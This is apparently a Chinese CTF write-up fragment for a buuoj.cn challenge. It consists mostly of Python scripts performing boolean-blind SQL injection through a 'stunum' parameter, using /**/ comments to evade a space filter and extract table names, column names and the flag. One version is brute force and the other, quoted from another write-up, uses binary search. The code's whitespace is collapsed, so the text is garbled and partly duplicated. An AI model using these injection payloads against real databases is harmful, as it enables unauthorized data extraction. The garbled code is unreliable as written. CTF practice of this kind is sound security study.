import requests
url ="http://8eda0aa2-9a0e-4fd3-93c1-f3face942c15.node3.buuoj.cn/"
payload =r"_-abcdefghijkmlnopqrstuvwxzy{}123456789!@#$%^&(),"
flag =""defcolounm():for i inrange(1,50):for j in payload:#db_url = url + "?stunum=if((select(substr(group_concat(table_name),{},1))from/**/information_schema.tables/**/where/**/table_schema=database())='{}',1,2)".format(i,j)#db_url = url + "?stunum=if((select(substr(group_concat(column_name),{},1))from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='flag')='{}',1,2)".format(i,j)
db_url = url +"?stunum=if((select(substr(group_concat(value),{},1))from/**/flag)='{}',1,2)".format(i,j)
r = requests.get(db_url)if"Hi admin"in r.text:global flag
flag += j
print(flag)breakif __name__=="__main__":print('start')
colounm()
我没写二分法的
下面是wp的二分法的
import requests
import time
flag =""for i inrange(1,100):
low =32
high =128
mid =(low + high)//2while low < high:
payload ='http://8eda0aa2-9a0e-4fd3-93c1-f3face942c15.node3.buuoj.cn/?stunum=1^(ascii(substr((select(group_concat(flag,0x2b,value))from(flag)),%d,1))>%d)'%(i,mid)
res = requests.get(payload)if'student number not exists'in res.text:
low = mid +1else:
high = mid
mid =(low + high)//2
time.sleep(0.1)if(mid ==32or mid ==127):break
flag = flag +chr(mid)print(flag)
sql注入的布尔盲注 过滤了空格直接交expimport requestsurl = "http://8eda0aa2-9a0e-4fd3-93c1-f3face942c15.node3.buuoj.cn/"payload =r"_-abcdefghijkmlnopqrstuvwxzy{}123456789!@#$%^&(),"flag = ""def colounm(): for i in range(1,50): for j in payload: .